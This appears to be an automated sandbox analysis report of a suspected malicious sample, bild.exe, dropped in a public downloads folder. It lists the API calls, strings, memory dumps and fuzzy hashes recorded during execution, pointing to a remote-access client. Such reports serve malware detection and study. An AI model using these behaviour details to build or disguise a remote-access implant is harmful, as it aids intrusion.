                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandle$FreeLibraryObjectSingleWait
                                                                                                      • String ID:
                                                                                                      • API String ID: 1314093303-0
                                                                                                      • Opcode ID: 7d2e314c4a79abf06013014507abe82da34b4e69185c6a4a9ad4d68e1235ff59
                                                                                                      • Instruction ID: 8e76f7fb4e107f93cb89770177b2081f40004907d07b5dfd0c3c9c847909df3d
                                                                                                      • Opcode Fuzzy Hash: 7d2e314c4a79abf06013014507abe82da34b4e69185c6a4a9ad4d68e1235ff59
                                                                                                      • Instruction Fuzzy Hash: A7F08135E1425ADFE714DF60D889BADF774FB88319F0002A9D82A52180DF355940CB50
                                                                                                      APIs
                                                                                                      • ioctlsocket.WSOCK32(938634B3,4004667F,00000000,a3vl), ref: 6C755D1F
                                                                                                      • select.WSOCK32(00000001,?,00000000,?,00000000,938634B3,4004667F,00000000,a3vl), ref: 6C755D62
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3511114217.000000006C751000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C750000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3511098641.000000006C750000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511143904.000000006C790000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511160154.000000006C799000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511174105.000000006C79A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511174105.000000006C79E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511206673.000000006C7A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_6c750000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ioctlsocketselect
                                                                                                      • String ID: a3vl
                                                                                                      • API String ID: 1457273030-3113412528
                                                                                                      • Opcode ID: c382ef304b21c52d9b9f5695f4f3b65ad7accec50c239ed977d64d175c2071d0
                                                                                                      • Instruction ID: 94dadf1a885e3377facc506e4fc199fc26c920355dae772f7d76524734d83d60
                                                                                                      • Opcode Fuzzy Hash: c382ef304b21c52d9b9f5695f4f3b65ad7accec50c239ed977d64d175c2071d0
                                                                                                      • Instruction Fuzzy Hash: BB213E71A012189BEB28CF14C959BEDB7B9EF48304F4081EAA80D97681DB745F98DF90
                                                                                                      APIs
                                                                                                      • GetCurrentProcess.KERNEL32(1102947F,?,11143E73,?), ref: 11143C2C
                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Downloads\bild.exe,00000104,?,11143E73,?), ref: 11143C49
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CurrentFileModuleNameProcess
                                                                                                      • String ID: C:\Users\Public\Downloads\bild.exe
                                                                                                      • API String ID: 2251294070-1293389744
                                                                                                      • Opcode ID: 723324e2a123dfbea80ddcbfb8a880b064ecb9608f963ee43b1e571dd00f4a9e
                                                                                                      • Instruction ID: b9aa28b4973dc8f7500fb142756b1fa860f28402029a3e5f5efe4e67c4e883a6
                                                                                                      • Opcode Fuzzy Hash: 723324e2a123dfbea80ddcbfb8a880b064ecb9608f963ee43b1e571dd00f4a9e
                                                                                                      • Instruction Fuzzy Hash: F811E7747282235BE7149F76C994719F7A5AB40B5DF20403EE819C76C4DB71F845C744
                                                                                                      APIs
                                                                                                      • _malloc.LIBCMT ref: 1110F4A9
                                                                                                        • Part of subcall function 11162B51: __FF_MSGBANNER.LIBCMT ref: 11162B6A
                                                                                                        • Part of subcall function 11162B51: __NMSG_WRITE.LIBCMT ref: 11162B71
                                                                                                        • Part of subcall function 11162B51: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162B96
                                                                                                      • _memset.LIBCMT ref: 1110F4D2
                                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AllocateErrorExitHeapLastMessageProcess_malloc_memsetwsprintf
                                                                                                      • String ID: ..\ctl32\Refcount.cpp
                                                                                                      • API String ID: 2803934178-2363596943
                                                                                                      • Opcode ID: 1dad7423e7d09c371aaf82e5f4f0c79299b8a2cfda0255715acc90ffe98602aa
                                                                                                      • Instruction ID: 747f5be640ff5df7f7be77ac0748be8e5b1ae2afb2ba592a3adef8646797d69b
                                                                                                      • Opcode Fuzzy Hash: 1dad7423e7d09c371aaf82e5f4f0c79299b8a2cfda0255715acc90ffe98602aa
                                                                                                      • Instruction Fuzzy Hash: B5E0C23AE4013933C112258A2C03FDBF69C8BD19FCF060021FE0CAA201E586B55181E6
                                                                                                      APIs
                                                                                                      • CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000,00000001,1102EFB6,MiniDumpType,000000FF,00000000,00000000,?,?,View), ref: 11014FE7
                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,View,Client,Bridge), ref: 11014FF8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CloseCreateFileHandle
                                                                                                      • String ID: \\.\NSWFPDrv
                                                                                                      • API String ID: 3498533004-85019792
                                                                                                      • Opcode ID: f0badf7843dd101c9c7a596aad23f33c11cadc83e0c29f65da520d4fe63b43e1
                                                                                                      • Instruction ID: 0b573536b28af4079515d3142ca801f5deca53cbeb6a996f0a1660ae0aa1d84a
                                                                                                      • Opcode Fuzzy Hash: f0badf7843dd101c9c7a596aad23f33c11cadc83e0c29f65da520d4fe63b43e1
                                                                                                      • Instruction Fuzzy Hash: A9D0C971A051387AF23416B66C4CFC7AD09DF06BB5F210264B53DE11D886104C41C2F1
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: _calloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 1679841372-0
                                                                                                      • Opcode ID: 9cedd041eecb3df7698fbc33d80b44fc007d69f78d2f5524ab9bd2bf2492814b
                                                                                                      • Instruction ID: 0024421513bb2e1abb717dbf2ce3cdefbb73aa1ee3cdb3a5feae03928f974db8
                                                                                                      • Opcode Fuzzy Hash: 9cedd041eecb3df7698fbc33d80b44fc007d69f78d2f5524ab9bd2bf2492814b
                                                                                                      • Instruction Fuzzy Hash: 8C519E7560020AAFDB50CF68CC81FAAB7A6FF8A704F148459F929DB280D771E901CF95
                                                                                                      APIs
                                                                                                      • _memset.LIBCMT ref: 6C758FE4
                                                                                                      • getsockname.WSOCK32(?,?,00000010,?,02F52EE8,?), ref: 6C759005
                                                                                                      • WSAGetLastError.WSOCK32(?,?,00000010,?,02F52EE8,?), ref: 6C75902E
                                                                                                        • Part of subcall function 6C755840: inet_ntoa.WSOCK32(00000080,?,00000000,?,6C758F91,00000000,00000000,6C79B8DA,?,00000080), ref: 6C755852
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3511114217.000000006C751000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C750000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3511098641.000000006C750000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511143904.000000006C790000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511160154.000000006C799000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511174105.000000006C79A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511174105.000000006C79E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511206673.000000006C7A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_6c750000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast_memsetgetsocknameinet_ntoa
                                                                                                      • String ID:
                                                                                                      • API String ID: 3066294524-0
                                                                                                      • Opcode ID: 58c09b217c1b936dc4568ee96f8a1831ff1ad175cf2993c3d3b7d689f77de604
                                                                                                      • Instruction ID: 25e7393e69deaf7674b9e7022cb31b423ffe19319c5851c4e999e726933a2fdb
                                                                                                      • Opcode Fuzzy Hash: 58c09b217c1b936dc4568ee96f8a1831ff1ad175cf2993c3d3b7d689f77de604
                                                                                                      • Instruction Fuzzy Hash: D7112171E0011CAFCF14DFA9D9459FEB7B8EB49214F40456ADC09E7240EB71AA158B91
                                                                                                      APIs
                                                                                                      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111145A
                                                                                                      • __wsplitpath.LIBCMT ref: 11111475
                                                                                                        • Part of subcall function 11169044: __splitpath_helper.LIBCMT ref: 11169086
                                                                                                      • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111114A9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: DirectoryInformationSystemVolume__splitpath_helper__wsplitpath
                                                                                                      • String ID:
                                                                                                      • API String ID: 1847508633-0
                                                                                                      • Opcode ID: 7498e584b69856d4904a5e87c0faea6464729445070a8fc0c411536d822b12a4
                                                                                                      • Instruction ID: 71a9510f599fa1c136cb45ff21797ad5c5790827a759e4d2b52c0b71367846c8
                                                                                                      • Opcode Fuzzy Hash: 7498e584b69856d4904a5e87c0faea6464729445070a8fc0c411536d822b12a4
                                                                                                      • Instruction Fuzzy Hash: 34116175A4021DABEB14DF94CD42FE9F378AB48B04F404199E7246B1C0E7B12A48CB65
                                                                                                      APIs
                                                                                                      • GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA01
                                                                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA08
                                                                                                        • Part of subcall function 1109E910: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,1102FCB2,?,00000000), ref: 1109E948
                                                                                                        • Part of subcall function 1109E910: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109E964
                                                                                                        • Part of subcall function 1109E910: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,0075DE90,0075DE90,0075DE90,0075DE90,0075DE90,0075DE90,0075DE90,111EEB64,?,00000001,00000001), ref: 1109E990
                                                                                                        • Part of subcall function 1109E910: EqualSid.ADVAPI32(?,0075DE90,?,00000001,00000001), ref: 1109E9A3
                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1109EA27
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Token$InformationProcess$AllocateCloseCurrentEqualHandleInitializeOpen
                                                                                                      • String ID:
                                                                                                      • API String ID: 2256153495-0
                                                                                                      • Opcode ID: 3278d9adbe4d3509b3b3548b9dad78e2718189f4cc0d765404142b0664a012dd
                                                                                                      • Instruction ID: 36b54363b319bb335bc5da0d0e9bdd0405b18079b131e91390d3ecc07929186c
                                                                                                      • Opcode Fuzzy Hash: 3278d9adbe4d3509b3b3548b9dad78e2718189f4cc0d765404142b0664a012dd
                                                                                                      • Instruction Fuzzy Hash: DCF05E78A15328EFD709CFF5D88482EB7A9AF08208700447DF629D3205E631EE009F50
                                                                                                      APIs
                                                                                                      • InitializeCriticalSection.KERNEL32(111F0908,4764EAAA,?,?,?,?,-00000001,11182078,000000FF,?,1110F7F8,00000001,?,11169683,?), ref: 1110F754
                                                                                                      • EnterCriticalSection.KERNEL32(111F0908,4764EAAA,?,?,?,?,-00000001,11182078,000000FF,?,1110F7F8,00000001,?,11169683,?), ref: 1110F770
                                                                                                      • LeaveCriticalSection.KERNEL32(111F0908,?,?,?,?,-00000001,11182078,000000FF,?,1110F7F8,00000001,?,11169683,?), ref: 1110F7B8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$EnterInitializeLeave
                                                                                                      • String ID:
                                                                                                      • API String ID: 3991485460-0
                                                                                                      • Opcode ID: de9cc3b242b9749762f72f1a9abe3d064888d8cc99300df6bb387b99347c91a8
                                                                                                      • Instruction ID: 724175da6b3b5eb63f60f43096b8b9410b0df93e13cce3f4766159a849acac97
                                                                                                      • Opcode Fuzzy Hash: de9cc3b242b9749762f72f1a9abe3d064888d8cc99300df6bb387b99347c91a8
                                                                                                      • Instruction Fuzzy Hash: 3D11C675A0061AAFE700CF65CD85B5BF7A9FB88714F010129E829E3340F7359808CB92
                                                                                                      APIs
                                                                                                      • LoadLibraryA.KERNEL32(00000000,00000000), ref: 11068A12
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: LibraryLoad
                                                                                                      • String ID: ??CTL32.DLL
                                                                                                      • API String ID: 1029625771-2984404022
                                                                                                      • Opcode ID: f114da26ba1a202df3ee97640f196ffb6169a957819133968d89773a25347f90
                                                                                                      • Instruction ID: 38d720fc7c26638894156a2f8924bac31edb6b50614c34829f37a9a02c5b1e22
                                                                                                      • Opcode Fuzzy Hash: f114da26ba1a202df3ee97640f196ffb6169a957819133968d89773a25347f90
                                                                                                      • Instruction Fuzzy Hash: 5831F5B2A04781DFE711CF59DC40B5AF7E8FB45724F0482AAE92897380E735A900CB92
                                                                                                      APIs
                                                                                                      • inet_ntoa.WSOCK32(00000080,?,00000000,?,6C758F91,00000000,00000000,6C79B8DA,?,00000080), ref: 6C755852
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3511114217.000000006C751000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C750000, based on PE: true
